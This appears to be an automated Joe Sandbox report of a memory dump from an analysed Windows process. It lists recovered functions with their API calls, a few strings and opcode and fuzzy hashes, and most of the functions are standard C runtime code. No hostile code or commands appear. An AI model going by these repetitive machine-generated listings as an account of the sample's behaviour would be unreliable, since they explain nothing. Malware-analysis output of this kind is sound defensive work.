Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 64e0bc4911477b1263376ea48cb617954b8134ef41f089a0f78a0c7672a6b695
Instruction ID: c6569965d825bd32fedd7540aeb594b0610abccfbf4010af306619ac64e7e3cd
Opcode Fuzzy Hash: 64e0bc4911477b1263376ea48cb617954b8134ef41f089a0f78a0c7672a6b695
Instruction Fuzzy Hash: 9371C37290530FABDF21AF548CA1BFE77ABAF45310F280059EA04A7391EA35DC058F64

Function 006D6E28 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 006D6E71
__alloca_probe_16.LIBCMT ref: 006D6E9D
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 006D6EDC
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006D6EF9
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 006D6F38
__alloca_probe_16.LIBCMT ref: 006D6F55
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006D6F97
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006D6FBA

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: c32ee6411d4e3097b804d12e1336e05a512c22b798c9b14cd733d6cdd7f19d00
Instruction ID: a6271ec25ea2b9fdaf99d56cbc36f58b0b79dc60fee80f82a9a61738b041a99f
Opcode Fuzzy Hash: c32ee6411d4e3097b804d12e1336e05a512c22b798c9b14cd733d6cdd7f19d00
Instruction Fuzzy Hash: AA51BC72D0461AABEB209F64DC41FEB7BABEF40740F15442AF91596390EB309D10CBA0

Function 006D2230 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006D223D
std::_Lockit::_Lockit.LIBCPMT ref: 006D225B
std::_Lockit::~_Lockit.LIBCPMT ref: 006D227C
std::_Lockit::~_Lockit.LIBCPMT ref: 006D22CC
std::_Facet_Register.LIBCPMT ref: 006D22F6
std::_Lockit::~_Lockit.LIBCPMT ref: 006D230F

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 96039dee2d2bbc42454bab0047aaaf15e549557302caf64810ff8b0c378d5111
Instruction ID: 0eaadd56f273f85493d5aa6ed3cf4c6eeb3bdd39ba033e23d7baf614c8fc1a31
Opcode Fuzzy Hash: 96039dee2d2bbc42454bab0047aaaf15e549557302caf64810ff8b0c378d5111
Instruction Fuzzy Hash: 1121B631D042129BC715EF14E89196AB7A2FBA4320F19065FF84197361DB35EF45C7D2

Function 006DA5AA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006DA5A1,006D8CDA,006D7E75), ref: 006DA5B8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006DA5C6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006DA5DF
SetLastError.KERNEL32(00000000,006DA5A1,006D8CDA,006D7E75), ref: 006DA631

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a26fea73b5b0d0d4d401811488b66b919e44c725e2bb6c0a6152b9284ebbe53e
Instruction ID: 03d5bb01ae241aa1d177b7b4cf0c27a25544991d9f7f4f61546f2f0d16cc98e6
Opcode Fuzzy Hash: a26fea73b5b0d0d4d401811488b66b919e44c725e2bb6c0a6152b9284ebbe53e
Instruction Fuzzy Hash: 2201FC32D0E211FF97A43BF57C859AA2A47EF51775B25122FF510C13E1EF514C015249

Function 006E1FE6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7215384A,?,?,00000000,006F3CC0,000000FF,?,006E1F76,?,?,006E1F4A,00000016), ref: 006E201B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006E202D
FreeLibrary.KERNEL32(00000000,?,00000000,006F3CC0,000000FF,?,006E1F76,?,?,006E1F4A,00000016), ref: 006E204F

Strings

mscoree.dll, xrefs: 006E2014
CorExitProcess, xrefs: 006E2025

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7a4625759581a39b712aad5f826caf62ca4b677603bc26fe07a1da54cae861ff
Instruction ID: 145a382ee4192bcdc13add5d404bd2faa482fcce71c973c87f8b8a8e4e920e74
Opcode Fuzzy Hash: 7a4625759581a39b712aad5f826caf62ca4b677603bc26fe07a1da54cae861ff
Instruction Fuzzy Hash: A2016231940B69AFDB219F50CC09BBEBBBFFB04B55F054525E912A22E0DF749D00CA90

Function 006E7B03 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 006E7B8A
__alloca_probe_16.LIBCMT ref: 006E7C4B
__freea.LIBCMT ref: 006E7CB2

Part of subcall function 006E5136: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,006D7FC8,?,?,?,?,?,006D27FE,00000001,?), ref: 006E5168

__freea.LIBCMT ref: 006E7CC7
__freea.LIBCMT ref: 006E7CD7

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 84510262ede541c1b665e6757dee321fb8d5efc3e4803008b4809ea503b44d5f
Instruction ID: a458ad7596645f046a59283d4c9e6c3b4f42d195d9c1bae2b55508fd4a5b2df7
Opcode Fuzzy Hash: 84510262ede541c1b665e6757dee321fb8d5efc3e4803008b4809ea503b44d5f
Instruction Fuzzy Hash: 5E51C37260A3866FEB205F66CC81DFB36AFEB04750B250529FD04D6240E630DC50C7A4

Function 006D59BD Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006D59C4
std::_Lockit::_Lockit.LIBCPMT ref: 006D59CE

Part of subcall function 006D2CF0: std::_Lockit::_Lockit.LIBCPMT ref: 006D2CFF
Part of subcall function 006D2CF0: std::_Lockit::~_Lockit.LIBCPMT ref: 006D2D1A

codecvt.LIBCPMT ref: 006D5A08
std::_Facet_Register.LIBCPMT ref: 006D5A1F
std::_Lockit::~_Lockit.LIBCPMT ref: 006D5A3F

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: b1039b0e787f186a814de0b0f7c8c8205ed6b9dabb086cf9d100353f89982489
Instruction ID: 11e0027448df4090b963e91f9dd85265ca6eec2432056a813215c65313af7a43
Opcode Fuzzy Hash: b1039b0e787f186a814de0b0f7c8c8205ed6b9dabb086cf9d100353f89982489
Instruction Fuzzy Hash: 2911A271D00A259FCB50EF68D8516AEBBA6AF44314F14050FF406A7781DF70EF008B95

Function 006D547A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006D5481
std::_Lockit::_Lockit.LIBCPMT ref: 006D548C
std::_Lockit::~_Lockit.LIBCPMT ref: 006D54FA

Part of subcall function 006D55DD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006D55F5

std::locale::_Setgloballocale.LIBCPMT ref: 006D54A7
_Yarn.LIBCPMT ref: 006D54BD

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: fe24f62010f242d0705c8929275a1b4928495668c03b9d401e7bf61e02d59dbd
Instruction ID: d963683d9746476ee36c4f7cc4af9746c326f84156d4e8d3e025804803e83184
Opcode Fuzzy Hash: fe24f62010f242d0705c8929275a1b4928495668c03b9d401e7bf61e02d59dbd
Instruction Fuzzy Hash: 16017175E00A649BC705EF24D85597D7BA3BF85350B68400FE50257391DF74AE42CB89

Function 006DB6F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,006DB6A3,00000000,00000001,008941BC,?,?,?,006DB846,00000004,InitializeCriticalSectionEx,006F6EA0,InitializeCriticalSectionEx), ref: 006DB6FF
GetLastError.KERNEL32(?,006DB6A3,00000000,00000001,008941BC,?,?,?,006DB846,00000004,InitializeCriticalSectionEx,006F6EA0,InitializeCriticalSectionEx,00000000,?,006DB5FD), ref: 006DB709
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,006DA513), ref: 006DB731

Strings

api-ms-, xrefs: 006DB716

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9cf3e22d696fc4ddda5e87275e6ff7a141b152c67169011e48d0767c46ec4b47
Instruction ID: 5d0e0f798d598df8b3ff186e7c597d9b6a419b3caccac5984921c994bfeca16a
Opcode Fuzzy Hash: 9cf3e22d696fc4ddda5e87275e6ff7a141b152c67169011e48d0767c46ec4b47
Instruction Fuzzy Hash: 66E01A31680308FBEB101F61EC4AFA93A66AF50B50F121021FA0EA83A4DBA19D54D6D8

Function 006E81B7 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(7215384A,00000000,00000000,00000000), ref: 006E821A

Part of subcall function 006EA3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006E7CA8,?,00000000,-00000008), ref: 006EA463

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006E8475
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006E84BD
GetLastError.KERNEL32 ref: 006E8560

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 196ea16f0247e8c65216381b9f0fd26968e78e633bbbf74c46447c19eb49276a
Instruction ID: 7582abec2efd1a702a2515f435b4f04cb4aa8df79d66d0d2378b69b430cbdf82
Opcode Fuzzy Hash: 196ea16f0247e8c65216381b9f0fd26968e78e633bbbf74c46447c19eb49276a
Instruction Fuzzy Hash: 9CD168B5D016989FCB15CFE9D8809EDBBB6FF48314F18416AE819E7351DB30A942CB50

Function 006DA6C1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 006DA788
___AdjustPointer.LIBCMT ref: 006DA7AB
___AdjustPointer.LIBCMT ref: 006DA847

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: a9e2d37a9d208a0f014fbcd078e49c58539033e36e9178339137b626674ca1b0
Instruction ID: 95c5df5fa5293f9abdd7eae96c53b07d46ff7efa01e124bf90f7c93b3b50053e
Opcode Fuzzy Hash: a9e2d37a9d208a0f014fbcd078e49c58539033e36e9178339137b626674ca1b0
Instruction Fuzzy Hash: 8E51CC7AE09206DFDB289F90D841BBAB7B6AF04300F14452FE80687791E731ED81D792

Function 006EA7D3 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 006EA3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006E7CA8,?,00000000,-00000008), ref: 006EA463

GetLastError.KERNEL32 ref: 006EA837
__dosmaperr.LIBCMT ref: 006EA83E
GetLastError.KERNEL32(?,?,?,?), ref: 006EA878
__dosmaperr.LIBCMT ref: 006EA87F

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6eaec13a14d6c7b9fa44ea99da710cc440b974b1f267e9a75a84aca6df4d9493
Instruction ID: 3fe8b98a09bb86b7db89a157b92e2a4c1efa8692d07ac37e10eaf1d034cb5844
Opcode Fuzzy Hash: 6eaec13a14d6c7b9fa44ea99da710cc440b974b1f267e9a75a84aca6df4d9493
Instruction Fuzzy Hash: 4C21D471601785AFDB60AFA7CC809ABB7ABEF00364711852DF91A97350DB30FD428792

Function 006E1056 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefe9bfcf8e65b5c9d28cf96a2d66d7e0651c742ad1c67b934dd61a9137ee640
Instruction ID: 7c60bfd679a6cc4f2718de6c68a3c41584a7eb2553ce26aa43407ed5c36ff366
Opcode Fuzzy Hash: eefe9bfcf8e65b5c9d28cf96a2d66d7e0651c742ad1c67b934dd61a9137ee640
Instruction Fuzzy Hash: 12210E31602385AFCB60AF66CC419EAB7ABEF123647114529FA158B251DB30EC80A7A0

Function 006EB769 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006EB771

Part of subcall function 006EA3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006E7CA8,?,00000000,-00000008), ref: 006EA463

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006EB7A9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006EB7C9

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: aeb8830fd55609620483a033a6f0a26bcd22faf6665cc907e9327605222f8563
Instruction ID: 9fde3407181ea4b0a8e9c197393f647b188b3fba5aaa1c6d89628be7424781ef
Opcode Fuzzy Hash: aeb8830fd55609620483a033a6f0a26bcd22faf6665cc907e9327605222f8563
Instruction Fuzzy Hash: FB118BB1503B957EAB1167B75CCDDBF6A6FDEC5298B202029F90291200FB20AD0186B9

Function 006F2339 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,006F10F4,00000000,00000001,00000000,00000000,?,006E85B4,00000000,00000000,00000000), ref: 006F2350
GetLastError.KERNEL32(?,006F10F4,00000000,00000001,00000000,00000000,?,006E85B4,00000000,00000000,00000000,00000000,00000000,?,006E8B3B,00000000), ref: 006F235C

Part of subcall function 006F2322: CloseHandle.KERNEL32(FFFFFFFE,006F236C,?,006F10F4,00000000,00000001,00000000,00000000,?,006E85B4,00000000,00000000,00000000,00000000,00000000), ref: 006F2332

___initconout.LIBCMT ref: 006F236C

Part of subcall function 006F22E4: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006F2313,006F10E1,00000000,?,006E85B4,00000000,00000000,00000000,00000000), ref: 006F22F7

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,006F10F4,00000000,00000001,00000000,00000000,?,006E85B4,00000000,00000000,00000000,00000000), ref: 006F2381

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c4b1f80eeeb0dae37701708de384ccd844a4422cd2f24b0cb8ad3b40b7455d2b
Instruction ID: 99b1b653d49afc7abf0a6d68242aa7c9566cae582cc445825d1ac08d7f456088
Opcode Fuzzy Hash: c4b1f80eeeb0dae37701708de384ccd844a4422cd2f24b0cb8ad3b40b7455d2b
Instruction Fuzzy Hash: E3F01C3750051ABBCF222FD5EC08AE93F67FB487A1F044014FB1989220CA728D20EF90

Function 006F45D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 238COMMON

Download Yara Rule

APIs

OffsetRect.USER32(00000000,00000000,00000000), ref: 006F46F6

Strings

0, xrefs: 006F4788
Zatlat, xrefs: 006F4630

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: OffsetRect
String ID: 0$Zatlat
API String ID: 177026234-1547964091
Opcode ID: f4b3b1cd9b02ddd645290e91af1256e64f04f1004dc35696834d7d1b58e1485a
Instruction ID: aa557c5300d448c7ec8f887a6c739b9ec6c708c862cfa4cddc1e28e5647be484
Opcode Fuzzy Hash: f4b3b1cd9b02ddd645290e91af1256e64f04f1004dc35696834d7d1b58e1485a
Instruction Fuzzy Hash: B091FD319083809BD310DF28C85576FBBE2AF85318F180A2EFAD49B792D7B5D9448B56

Function 006DA3B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 006DA3EF
__IsNonwritableInCurrentImage.LIBCMT ref: 006DA4A3

Strings

csm, xrefs: 006DA48D

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: a698e172a53ae4d363dc770772524df928383874415b94688711c0717daf8701
Instruction ID: 54fb5493e5994827075ffc4f7ccb9fba14af6ec3a4a94e2e6e1febf1f02c4c09
Opcode Fuzzy Hash: a698e172a53ae4d363dc770772524df928383874415b94688711c0717daf8701
Instruction Fuzzy Hash: E341A634E04218DBCF10DFA8D884AAE7BF7AF45324F14815AE8199B352D7B1DA15CB92

Function 006DACBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 006DACE2

Strings

RCC, xrefs: 006DACFC
MOC, xrefs: 006DACF4

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

